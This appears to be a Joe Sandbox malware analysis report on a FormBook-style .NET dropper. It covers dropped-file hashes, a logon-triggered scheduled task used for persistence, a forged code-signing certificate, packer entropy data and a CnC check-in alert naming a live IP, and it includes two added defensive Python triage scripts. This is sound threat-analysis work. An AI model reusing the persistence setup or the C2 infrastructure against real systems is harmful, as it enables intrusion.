                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                          Process:C:\Users\user\AppData\Roaming\WOzeoJQi.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1730
                          Entropy (8bit):5.35299682261553
                          Encrypted:false
                          SSDEEP:48:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HKHKMRbHKnHKU57Uivj:Pq5qHwCYqh3oPtI6eqzxqqMRbqnqU57n
                          MD5:B0DF99A47CF8612EF42E4C30907F5CAD
                          SHA1:9C53411244A7810D704C743BA3E13DCA77839074
                          SHA-256:97B250764E2328216E67001A7C6B207A74BDD90782669639C6469634DAB5DE58
                          SHA-512:8A9A273E145414FC578426B6BF7D1A52DAF9842FB81C8886D2200674E4ED8CCDADA5A7259A915A1685BAB5BDACDE2DF2DF0E06B105D60D7A7E5B85305C2E7FC7
                          Malicious:false
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):2232
                          Entropy (8bit):5.380805901110357
                          Encrypted:false
                          SSDEEP:48:lylWSU4xympjgs4RIoU99tK8NPZHUl7u1iMugeC/ZM0Uyus:lGLHxvCsIfA2KRHmOugw1s
                          MD5:2841736A1E367C6D039C41512DA2893E
                          SHA1:8AE1356D954F14390DD115EB92E2B01F86E98141
                          SHA-256:70D4743FAB5C407020B872595615D3B018AC17A6F504084BF1E95B061C97047E
                          SHA-512:E11A1F186A9B75658F905B7128526E054CEE572A4F55BBB864B5E8B5DC3D8B62D1E160F31472213DB0CEB8A612D71B23DAE03EBC6AB5BC0D8933732F2007EF6C
                          Malicious:false
                          Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                          Process:C:\Windows\SysWOW64\runas.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                          Category:dropped
                          Size (bytes):196608
                          Entropy (8bit):1.1239949490932863
                          Encrypted:false
                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                          MD5:271D5F995996735B01672CF227C81C17
                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                          Malicious:false
                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Users\user\Desktop\Inquiry files v2.exe
                          File Type:XML 1.0 document, ASCII text
                          Category:dropped
                          Size (bytes):1595
                          Entropy (8bit):5.0984017120835095
                          Encrypted:false
                          SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLa/xvn:cge7QYrFdOFzOzN33ODOiDdKrsuTm5v
                          MD5:B9A1E0C4E27119F87CA0FA1C9FD61777
                          SHA1:615DFD9A8BE2C67410213D3E2693B10A1FD92F4E
                          SHA-256:6E41183C577875F7FE89BD1DF0577373513FDD2D11C130395379EF38E1361A20
                          SHA-512:073B373DD3E5C60AD0FF9BC715B7E46446F7758ABEBF0A630A3B5DA092899842F72623FDC2DF84491C8F0594E80440D0B5C5006575B56D4D1F928294865FD884
                          Malicious:true
                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
                          Process:C:\Users\user\AppData\Roaming\WOzeoJQi.exe
                          File Type:XML 1.0 document, ASCII text
                          Category:dropped
                          Size (bytes):1595
                          Entropy (8bit):5.0984017120835095
                          Encrypted:false
                          SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLa/xvn:cge7QYrFdOFzOzN33ODOiDdKrsuTm5v
                          MD5:B9A1E0C4E27119F87CA0FA1C9FD61777
                          SHA1:615DFD9A8BE2C67410213D3E2693B10A1FD92F4E
                          SHA-256:6E41183C577875F7FE89BD1DF0577373513FDD2D11C130395379EF38E1361A20
                          SHA-512:073B373DD3E5C60AD0FF9BC715B7E46446F7758ABEBF0A630A3B5DA092899842F72623FDC2DF84491C8F0594E80440D0B5C5006575B56D4D1F928294865FD884
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
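The two task definitions above register a LogonTrigger for the analysis user, run at LeastPrivilege with InteractiveToken and StartWhenAvailable, which is the shape of user-level scheduled-task persistence; the preview is cut off before the Actions element, so the command the task runs is not visible here. The script below is an added example and not part of the Joe Sandbox report: it audits a task definition in this XML namespace for the properties an analyst checks first, namely enabled logon or boot triggers, Exec commands under user-writable paths, an elevated RunLevel and the Hidden flag. The sample task it parses is constructed for the example and its Exec path is a hypothetical placeholder; the list of user-writable locations is an assumption to extend for your own estate.

```python
"""Audit a Windows Task Scheduler task definition for persistence tells.

Added example (not Joe Sandbox code). Parses the Task XML namespace used on the
page and reports: enabled logon/boot triggers, Exec actions that point into
user-writable locations, elevated RunLevel and hidden tasks. The sample task
below is constructed for the example; its Exec path is hypothetical.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
PERSISTENCE_TRIGGERS = {"LogonTrigger", "BootTrigger"}
# Locations a standard user can write to; an Exec command under any of these is a
# classic dropper pattern (assumption: the list is illustrative, extend for your estate).
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\",
                 "%appdata%", "%localappdata%", "%temp%", "%tmp%")


def audit_task_xml(text: str) -> list:
    """Return a list of human-readable findings; an empty list means nothing was flagged."""
    # Exported task XML declares encoding="UTF-16", but we already hold decoded text,
    # so drop the declaration before handing the string to the parser.
    root = ET.fromstring(re.sub(r"^\s*<\?xml[^>]*\?>", "", text))
    findings = []

    triggers = root.find("t:Triggers", NS)
    for trig in (triggers if triggers is not None else []):
        kind = trig.tag.split("}")[-1]
        enabled = trig.findtext("t:Enabled", "true", NS).strip().lower() != "false"
        if enabled and kind in PERSISTENCE_TRIGGERS:
            findings.append(f"enabled persistence trigger: {kind}")

    for cmd in root.iterfind(".//t:Actions/t:Exec/t:Command", NS):
        raw = (cmd.text or "").strip().strip('"')
        if any(marker in raw.lower() for marker in USER_WRITABLE):
            findings.append(f"Exec from user-writable location: {raw}")

    if root.findtext(".//t:Principals/t:Principal/t:RunLevel", "", NS).strip() == "HighestAvailable":
        findings.append("RunLevel HighestAvailable (elevated)")
    if root.findtext("t:Settings/t:Hidden", "false", NS).strip().lower() == "true":
        findings.append("task is hidden")
    return findings


# Constructed sample in the shape of the dropped task definition on this page;
# the Exec command path is a hypothetical placeholder, not taken from the report.
SAMPLE_TASK = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>user-PC\\user</Author></RegistrationInfo>
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled><UserId>user-PC\\user</UserId></LogonTrigger>
    <RegistrationTrigger><Enabled>false</Enabled></RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author"><UserId>user-PC\\user</UserId>
      <LogonType>InteractiveToken</LogonType><RunLevel>LeastPrivilege</RunLevel></Principal>
  </Principals>
  <Settings><MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
    <StartWhenAvailable>true</StartWhenAvailable><Hidden>false</Hidden></Settings>
  <Actions Context="Author">
    <Exec><Command>"C:\\Users\\user\\AppData\\Roaming\\example.exe"</Command></Exec>
  </Actions>
</Task>"""

# Constructed benign control: scheduled maintenance launched from a system directory.
BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><Enabled>true</Enabled></TimeTrigger></Triggers>
  <Principals><Principal><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Actions><Exec><Command>C:\\Windows\\System32\\cleanmgr.exe</Command></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for name, xml_text in (("sample", SAMPLE_TASK), ("benign", BENIGN_TASK)):
        print(name, audit_task_xml(xml_text) or ["no findings"])
```

Run it against the XML exported by `schtasks /Query /XML /TN <name>` or read directly from C:\Windows\System32\Tasks; the audit flags on trigger type and command location rather than on the task name, so a renamed task with the same properties is still caught.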
                          Process:C:\Users\user\Desktop\Inquiry files v2.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):807432
                          Entropy (8bit):7.898486542785907
                          Encrypted:false
                          SSDEEP:12288:NyPDWx2PQfAHVvkSGEXrpyJ5LMEdzWImMQzxta/yVcDAc2DfDwsFuhb2rI2ADzPD:CawMEvLX1Is6/kEAX7+3rPUc
                          MD5:9C2717586122DB3E57BA56513F66E1B8
                          SHA1:8CBB9FBC61AB2CCBDBED70828FCBAE389F7B2E1F
                          SHA-256:AD233CDCF6CEAB12B375CCDBF782170CB5717A76F8ECD5D7E45F84800F8AD2CC
                          SHA-512:D4C4338E54E692A449D2B4855BFCB3488EEE014E776D3C72FCB88C3C7761086E4CEF722D0394CEA37D37A0A7C10137BF13E79547567F98C8CB1E9AF298CF4FAD
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 66%
                           • Antivirus: Virustotal, Detection: 48%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p..f..............0......4........... ... ....@.. ....................................@.....................................O.... ...0...............6...`....................................................... ............... ..H............text........ ...................... ..`.rsrc....0... ...2..................@..@.reloc.......`......................@..B........................H...........h...........\j..(............................................0..L.........}.....(%......(&.....(............s'.....((....o).....(*....o+.....(,....*.0............}........(-........(......,5...(............s'.....(.....o).....(.....o+....8s....r...p.{...(/...o0...t{.......(1..........9.....s%........s2...s3...o4......o(...r...po5..........,$..((.....o(...r...po5...s....o6.......o(...r)..po5..........,$..((.....o(...r)..po5...s....o6........o7...(8.......o9...(:...
                          Process:C:\Users\user\Desktop\Inquiry files v2.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0
                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):7.898486542785907
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                          • Win32 Executable (generic) a (10002005/4) 49.93%
                          • Windows Screen Saver (13104/52) 0.07%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          • DOS Executable Generic (2002/1) 0.01%
                          File name:Inquiry files v2.exe
                          File size:807'432 bytes
                          MD5:9c2717586122db3e57ba56513f66e1b8
                          SHA1:8cbb9fbc61ab2ccbdbed70828fcbae389f7b2e1f
                          SHA256:ad233cdcf6ceab12b375ccdbf782170cb5717a76f8ecd5d7e45f84800f8ad2cc
                          SHA512:d4c4338e54e692a449d2b4855bfcb3488eee014e776d3c72fcb88c3c7761086e4cef722d0394cea37d37a0a7c10137bf13e79547567f98c8cb1e9af298cf4fad
                          SSDEEP:12288:NyPDWx2PQfAHVvkSGEXrpyJ5LMEdzWImMQzxta/yVcDAc2DfDwsFuhb2rI2ADzPD:CawMEvLX1Is6/kEAX7+3rPUc
                          TLSH:390512037AE85B44D4B787B5A6B192106FB776871A33C31E1CD920DE0DF13818B66BA7
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p..f..............0......4........... ... ....@.. ....................................@................................
                          Icon Hash:0f3b5fede1456317
                          Entrypoint:0x4c05d6
                          Entrypoint Section:.text
                          Digitally signed:true
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66948470 [Mon Jul 15 02:07:44 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                          Signature Valid:false
                          Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                          Signature Validation Error:The digital signature of the object did not verify
                           Error Number:-2146869232 (0x80096010, TRUST_E_BAD_DIGEST: the Authenticode hash carried in the signature does not match the file, so the signature was either lifted from another signed binary or the file was modified after signing)
                           Not Before:13/11/2018 01:00:00
                           Not After:09/11/2021 00:59:59
                          Subject Chain
                          • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                          Version:3
                          Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                          Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                          Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                          Serial:7C1118CBBADC95DA3752C46E47A27438
                           Instruction
                           jmp dword ptr [00402000h]
                           add byte ptr [eax], al (repeated 97 times)
                           The entry point is the 6-byte native stub every 32-bit .NET executable carries: an indirect jmp through the IAT slot at RVA 0x2000 (image base 0x400000 + 0x2000 = 0x402000), which holds mscoree.dll!_CorExeMain, the only import in the table below. The 97 "add byte ptr [eax], al" lines are the disassembler reading the 00 00 padding after the stub, not code.
                           Name | Virtual Address | Virtual Size | Is in Section
                           IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc0584 | 0x4f | .text
                           IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc2000 | 0x3004 | .rsrc
                           IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_SECURITY | 0xc1c00 | 0x3608 |
                           IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc6000 | 0xc | .reloc
                           IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                           IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                           IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                           Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                           .text | 0x2000 | 0xbe5dc | 0xbe600 | 2c70b7253b8276bb85ae318c8f2dcd31 | False | 0.9194409676625082 | COM executable for DOS | 7.906017390992127 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                           .rsrc | 0xc2000 | 0x3004 | 0x3200 | f06c31e41e162ea237d4f53355b870a7 | False | 0.8790625 | data | 7.531946676671177 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                           .reloc | 0xc6000 | 0xc | 0x200 | 8467afd35ea42e763f9be197f5d74569 | False | 0.041015625 | data | 0.07763316234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                           Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                           RT_ICON | 0xc2100 | 0x292f | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9864364981504316
                           RT_GROUP_ICON | 0xc4a40 | 0x14 | data | | | 1.05
                           RT_VERSION | 0xc4a64 | 0x3a0 | data | | | 0.41810344827586204
                           RT_MANIFEST | 0xc4e14 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                           DLL | Import
                           mscoree.dll | _CorExeMain
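The section table above carries the static tell behind the "potential unpacker" verdict: a .text section at entropy 7.906, close to the 8.0 of random data, in a file whose only native import is mscoree.dll!_CorExeMain, that is, a .NET assembly whose code section is almost entirely compressed or encrypted payload. The following Python script is an added example, not part of the Joe Sandbox report or its tooling; it walks a PE section table with the standard library only and applies that entropy heuristic per section. The 7.0 threshold and the header-only PE fixture it builds for its own test run are assumptions of the example.

```python
"""Section-entropy triage for a PE file.

Added example (not Joe Sandbox code). Walks the PE section table with the
standard library only, computes Shannon entropy per section and flags
executable sections whose entropy reaches a packer-style threshold.
The 7.0 cut-off is an assumption: a common rule of thumb, not a standard.
"""
import math
import struct
import sys
from collections import Counter

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
HIGH_ENTROPY = 7.0  # assumption: triage threshold, bits per byte


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_sections(image: bytes):
    """Yield the section headers of a PE image together with their raw bytes."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, coff)
    first = coff + 20 + opt_size  # the section table follows the optional header
    for i in range(nsections):
        # IMAGE_SECTION_HEADER (40 bytes)
        (name, vsize, vaddr, raw_size, raw_ptr, _, _, _, _, chars) = struct.unpack_from(
            "<8sIIIIIIHHI", image, first + i * 40)
        yield {
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": vsize,
            "virtual_address": vaddr,
            "raw_size": raw_size,
            "characteristics": chars,
            "data": image[raw_ptr:raw_ptr + raw_size],
        }


def triage(image: bytes, threshold: float = HIGH_ENTROPY):
    """Per-section verdicts: an executable section with high entropy is the packer tell."""
    rows = []
    for s in pe_sections(image):
        ent = shannon_entropy(s["data"])
        executable = bool(s["characteristics"] & (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE))
        rows.append({
            "name": s["name"],
            "entropy": round(ent, 3),
            "executable": executable,
            "high_entropy": ent >= threshold,
            "suspicious": executable and ent >= threshold,
        })
    return rows


def build_image(sections):
    """Constructed fixture: a header-only PE carrying the given (name, characteristics,
    payload) sections. Enough structure for pe_sections(); not a loadable executable."""
    e_lfanew, opt_size = 0x40, 0
    headers_len = (e_lfanew + 4 + 20 + opt_size + 40 * len(sections) + 0x1FF) & ~0x1FF
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    hdrs, payload, raw_ptr, vaddr = b"", b"", headers_len, 0x2000
    for name, chars, data in sections:
        raw_size = (len(data) + 0x1FF) & ~0x1FF  # FileAlignment 0x200
        hdrs += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), vaddr,
                            raw_size, raw_ptr, 0, 0, 0, 0, chars)
        payload += data.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        vaddr += (raw_size + 0xFFF) & ~0xFFF  # SectionAlignment 0x1000
    return (dos + b"PE\0\0" + coff + hdrs).ljust(headers_len, b"\0") + payload


if __name__ == "__main__":
    if len(sys.argv) > 1:
        image = open(sys.argv[1], "rb").read()
    else:  # constructed sample: a uniform-byte code section beside a constant data section
        image = build_image([(b".text", 0x60000020, bytes(range(256)) * 2),
                             (b".data", 0xC0000040, b"A" * 512)])
    for row in triage(image):
        print(row)
```

Entropy alone is a heuristic: legitimate installers and media-heavy resources also score high, which is why the verdict is keyed on the executable flag, and why a high-entropy but non-executable .rsrc (7.53 here) is reported but not flagged. Pair the result with the import table; a .NET file with a single mscoree.dll import and a near-8.0 .text has nothing to do with optimisation and everything to do with an in-memory second stage.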
                           Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                           07/18/24-07:58:39.821867 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49735 | 80 | 192.168.2.6 | 13.248.169.48
